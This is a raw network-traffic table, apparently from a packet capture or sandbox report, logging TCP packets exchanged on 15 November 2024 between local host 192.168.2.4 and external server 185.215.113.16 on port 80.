Nov 15, 2024 14:09:35.282321930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282331944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282337904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282342911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282347918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.282378912 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.282421112 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.283215046 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283226967 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283231020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283236027 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283241034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283246040 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283251047 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283262014 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283267975 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283272982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283278942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283283949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.283303976 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.283401012 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.284100056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284111977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284117937 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284122944 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284127951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284133911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284138918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284143925 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284148932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284153938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284159899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.284238100 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.285026073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285037994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285043001 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285048008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285053015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285058022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285062075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285068035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285073042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285079002 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285084009 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285139084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.285932064 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285943985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285948992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285953999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285967112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285976887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285985947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285990953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285995960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.285996914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.286000967 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.286006927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.286011934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.286015034 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.286017895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.286062956 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.327476025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.327529907 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.327569008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.327584028 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.327594995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.327610016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.327630043 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.357810020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.357822895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.357832909 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.357870102 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.357897997 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358064890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358074903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358086109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358097076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358110905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358143091 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358179092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358191013 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358202934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358211994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358221054 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358242035 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358266115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358372927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358383894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358392954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358416080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358442068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358854055 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358879089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358887911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.358910084 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.358926058 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.397121906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397209883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397222042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397267103 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.397357941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397370100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397382021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397393942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397403955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397403955 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.397435904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.397460938 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.397713900 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397726059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397737026 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397747993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397759914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.397768021 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.397798061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398080111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398092031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398102999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398113012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398123980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398139954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398145914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398145914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398173094 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398468971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398482084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398492098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398503065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398514986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398519993 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398531914 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398562908 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398705959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398752928 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398825884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398845911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398855925 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398869991 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398880959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398883104 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398894072 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398905039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398909092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398916960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398926973 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398931026 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.398938894 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.398967981 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.399593115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399605036 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399615049 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399625063 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399637938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399648905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399651051 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.399661064 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399672985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399672985 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.399684906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399691105 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.399698019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399708986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.399720907 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.399749041 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400307894 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400321007 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400331974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400372982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400401115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400580883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400593042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400604010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400630951 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400635004 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400648117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400659084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400660038 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400671959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400681019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400686026 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400691986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400703907 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400715113 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.400717020 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400732994 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.400763988 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401330948 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401340961 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401346922 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401355982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401365995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401376963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401386976 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401392937 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401397943 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401403904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401410103 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401421070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401424885 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401431084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401437044 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401443005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401452065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401460886 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401470900 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401473045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401484966 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.401495934 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401513100 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.401523113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402198076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402209997 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402219057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402229071 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402239084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402250051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402252913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402260065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402271986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402280092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402282953 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402292967 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402298927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402309895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402317047 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402328014 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402339935 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402365923 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402806044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402817011 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402822018 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402827024 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402832031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402836084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402841091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402852058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402858019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402869940 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402880907 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.402894020 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.402909040 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.444781065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.444798946 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.444808006 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.444889069 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475022078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475033998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475044012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475100994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475111008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475121021 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475131035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475136042 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475191116 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475326061 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475374937 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475421906 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475466013 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475476027 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475486040 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475496054 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475508928 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475522995 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475553989 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.475619078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.475657940 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.476021051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.476064920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.476066113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.476077080 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.476103067 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.476119995 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514369011 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514379978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514389038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514436960 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514473915 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514492035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514503002 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514513969 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514523983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514533997 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514542103 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514571905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514743090 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514754057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514792919 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514799118 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514811039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514815092 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514822960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.514843941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.514869928 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515135050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515146971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515157938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515168905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515178919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515193939 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515223026 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515400887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515413046 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515436888 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515448093 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515456915 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515458107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515470982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515479088 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515487909 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515516996 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515794992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515806913 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515818119 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515851974 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515865088 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515868902 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515881062 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515891075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515901089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515907049 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515912056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515923023 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515923977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515933990 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.515952110 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.515971899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.516413927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516426086 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516433954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516444921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516453981 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516463995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516465902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.516475916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516491890 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.516499996 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516510963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516513109 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.516522884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.516530991 CET	80	49761	185.215.113.16	192.168.2.4
